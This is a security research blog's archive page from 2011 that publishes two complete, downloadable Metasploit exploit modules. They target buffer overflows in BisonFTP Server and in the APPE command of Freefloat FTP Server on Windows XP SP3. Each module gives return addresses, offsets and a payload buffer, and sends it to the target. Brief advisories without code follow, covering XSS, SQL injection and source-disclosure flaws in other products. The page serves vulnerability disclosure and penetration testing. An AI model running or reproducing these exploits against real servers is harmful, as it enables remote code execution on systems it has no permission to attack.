SecPod Research Blog
TwitterFacebookLinkedIn

Monthly Archives: September 2011

Metasploit Module – BisonFTP Server Remote Buffer Overflow Vulnerability

Posted on by Posted in Exploits, Metasploit 1 Comment

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for BisonFTP Server Remote Buffer Overflow Vulnerability.

Metasploit : Download here.


##
# $Id: bison_server_bof.rb 2011-08-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BisonFTP Server Remote Buffer Overflow Vulnerability',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the BisonFTP Server <= v3.5 .
			},
			'Author'         =>
				[
					'localh0t',		# Initial PoC
					'veerendragg @ SecPod',	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'BID', '49109'],
					[ 'CVE', '1999-1510'],
					[ 'URL', 'http://secpod.org/blog/?p=384'],
					[ 'URL', 'http://www.exploit-db.com/exploits/17649'],
					[ 'URL', 'http://secpod.org/msf/bison_server_bof.rb'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 388,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x0040333f, # call edx from Bisonftp.exe
							'Offset' => 1432
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		print_status("Connected to #{datastore['RHOST']}:#{datastore['RPORT']}")
		sploit = rand_text_alpha(1028)					## Random Buffer
		sploit << "\x90" * 16						## Padding
		sploit << payload.encoded					## Encoded Payload
		sploit << "\x90" * (388 - payload.encoded.length)		## More Nops
		sploit << [target.ret].pack('V')				## Return Address
		sploit << rand_text_alpha(39)					## More Buffer

		print_status("Sending payload...")
		sock.put(sploit)

		handler
		disconnect
	end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

Metasploit Module – Freefloat FTP Server APPE Command Overflow

Posted on by Posted in Exploits, Metasploit Leave a comment

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for Freefloat FTP Server APPE Command Overflow Vulnerability.

Metasploit : Download here.


##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Freefloat FTP Server APPE Command Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the APPE command in the Freefloat FTP server.
			},
			'Author'         =>
				[
					'veerendragg @ SecPod',	# Initial Discovery
					'veerendragg @ SecPod'	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'URL', 'http://secpod.org/blog/?p=310' ],
					[ 'URL', 'http://secpod.org/blog/?p=353' ],
					[ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
					[ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 500,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x7e429353, # jmp esp from user32.dll
							'Offset' => 246
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect_login
		print_status("Trying target #{target.name}...")
		buf = make_nops(target['Offset'])
		buf << [target.ret].pack('V')
		buf << make_nops(30)
		buf << payload.encoded

		print_status("Sending exploit buffer...")
		send_cmd( ['APPE', buf] , false )

		handler
		disconnect
	end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities

Posted on by Posted in Advisories 2 Comments

SecPod Research Team member (Antu Sanadi) has found Multiple Vulnerabilities in Xataface WebAuction and Xataface Librarian DB. The vulnerability is caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

MYRE Real Estate Software Multiple XSS and SQL Injection Vulnerabilities

Posted on by Posted in Advisories Leave a comment

SecPod Research Team member (Sooraj K.S) has found Multiple XSS and SQL Injection Vulnerabilities in MYRE Real Estate Software. The vulnerability is caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

CVE Info : CVE-2011-3393 , CVE-2011-3394

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Apache ActiveMQ Source Code Disclosure Vulnerability

Posted on by Posted in Advisories Leave a comment

SecPod Research Team member (Veerendra G.G) has found information disclosure vulnerability in Apache ActiveMQ. The flaws are caused due to input validation errors while processing URL, which can be exploited to view the source code of a visited page and leads to further attacks.

More information on the flaws can be found here.

CVE Info : CVE-2010-1587

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team